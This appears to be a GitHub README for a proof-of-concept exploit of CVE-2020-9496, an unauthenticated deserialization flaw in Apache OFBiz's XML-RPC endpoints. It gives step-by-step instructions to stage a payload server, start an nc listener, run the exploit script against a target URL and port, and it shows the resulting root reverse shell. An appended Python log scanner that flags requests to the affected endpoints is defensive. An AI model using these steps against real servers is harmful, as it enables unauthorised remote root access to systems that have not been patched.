s4dbrd/CVE-2020-9496

CVE-2020-9496

Because the two XML-RPC-related requests in webtools (xmlrpc and ping) do not use authentication, they are vulnerable to unsafe deserialization.
This issue was reported to the security team by Alvaro Munoz (pwntester@github.com) from the GitHub Security Lab team.

Affected Version: 17.12.01

Fixed Versions: 18.12.01, 17.12.04

Original Blog: https://securitylab.github.com/advisories/GHSL-2020-069-apache_ofbiz/
Apache's Post: https://issues.apache.org/jira/browse/OFBIZ-11716
GitHub's PoC: https://github.com/g33xter/CVE-2020-9496

To make this exploit work, follow these steps:

Step 1: Host HTTP Service with python3

> sudo python3 -m http.server 80

Step 2: Run an nc listener on the desired port (recommended: 8001)

> nc -nlvp 8001

Step 3: Change Website's URL and Port inside the script:

url='https://127.0.0.1' # CHANGE THIS
port=8443 # CHANGE THIS

Step 4: Run the exploit as shown below

> ./cve-2020-9496.sh -i IP -p PORT

Step 5: Check nc listener

❯ nc -nlvp 8001
listening on [any] 8001 ...
connect to [10.10.x.x] from (UNKNOWN) [10.10.x.x] 57500
bash: cannot set terminal process group (31): Inappropriate ioctl for device
bash: no job control in this shell
root@poc:/usr/src/apache-ofbiz-17.12.01# id
id
uid=0(root) gid=0(root) groups=0(root)
root@poc:/usr/src/apache-ofbiz-17.12.01# 
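
A defender-side check for the requests this issue concerns, added here as an example and not part of the original repository: it scans web access logs for requests to the two webtools XML-RPC endpoints and groups them by source address. The endpoint paths `/webtools/control/xmlrpc` and `/webtools/control/ping`, the combined log format, and the sample lines are assumptions; the function names are hypothetical.

```python
import re
from collections import defaultdict
from urllib.parse import unquote

# Assumed paths (not stated on this page): OFBiz serves webtools requests
# under /webtools/control/<request-name>.
WATCHED = {"/webtools/control/xmlrpc", "/webtools/control/ping"}

# Combined access-log format: ip ident user [time] "METHOD target PROTO" status ...
LINE_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>[A-Z]+) (?P<target>\S+) [^"]*" (?P<status>\d{3}) '
)

def normalize(target):
    """Reduce a request target to a path that can be compared with WATCHED."""
    path = unquote(target.split("?", 1)[0])  # drop query string, decode %xx
    path = re.sub(r";[^/]*", "", path)       # drop ;jsessionid=... parameters
    path = re.sub(r"/{2,}", "/", path)       # collapse duplicate slashes
    return path.rstrip("/")

def find_xmlrpc_hits(lines):
    """Return {source_ip: [(timestamp, method, path, status), ...]}."""
    hits = defaultdict(list)
    for line in lines:
        m = LINE_RE.match(line)
        if not m:
            continue  # not in the expected log format
        path = normalize(m["target"])
        if path in WATCHED:
            hits[m["ip"]].append((m["ts"], m["method"], path, int(m["status"])))
    return dict(hits)

# Constructed sample lines (documentation address ranges, not real traffic).
SAMPLE = [
    '198.51.100.7 - - [10/Aug/2020:10:01:02 +0000] "POST /webtools/control/xmlrpc HTTP/1.1" 200 411 "-" "curl/7.68.0"',
    '198.51.100.7 - - [10/Aug/2020:10:01:05 +0000] "POST /webtools/control/xmlrpc;jsessionid=AB12?x=1 HTTP/1.1" 200 411 "-" "curl/7.68.0"',
    '203.0.113.9 - - [10/Aug/2020:10:02:00 +0000] "GET /webtools//control/%70ing HTTP/1.1" 200 90 "-" "-"',
    '192.0.2.4 - - [10/Aug/2020:10:03:00 +0000] "GET /ecommerce/control/main HTTP/1.1" 200 5120 "-" "Mozilla/5.0"',
    'malformed line',
]

if __name__ == "__main__":
    for ip, events in find_xmlrpc_hits(SAMPLE).items():
        for ts, method, path, status in events:
            print(f"{ip} {ts} {method} {path} -> {status}")
```

A hit means the endpoint was requested, not that deserialization succeeded; compare the installed OFBiz version against the affected and fixed versions listed above.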
